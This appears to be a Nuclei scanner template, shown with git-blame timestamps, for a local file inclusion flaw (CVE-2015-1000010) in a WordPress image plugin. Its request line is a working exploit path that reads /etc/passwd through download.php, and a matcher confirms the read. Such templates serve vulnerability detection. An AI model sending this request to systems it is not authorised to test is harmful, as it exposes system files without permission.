2022-08-06 16:54:58 +00:00
id : CVE-2015-1000010
2022-02-12 18:14:11 +00:00
info :
2022-08-06 16:54:58 +00:00
name : WordPress Simple Image Manipulator < 1.0 - Local File Inclusion
2022-02-12 18:14:11 +00:00
author : dhiyaneshDK
severity : high
2022-08-10 07:43:58 +00:00
description : |
WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.
2022-04-22 10:38:41 +00:00
reference :
- https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
2022-08-06 16:54:58 +00:00
- https://wpscan.com/vulnerability/40e84e85-7176-4552-b021-6963d0396543
2022-08-10 07:43:58 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2015-1000010
2022-08-25 08:56:24 +00:00
- http://www.vapidlabs.com/advisory.php?v=147
2022-07-29 14:04:23 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-08-06 16:54:58 +00:00
cve-id : CVE-2015-1000010
2022-08-25 08:56:24 +00:00
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : packetstorm,wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp
2022-02-12 18:14:11 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200
2022-07-29 14:04:23 +00:00
# Enhanced by mp on 2022/07/29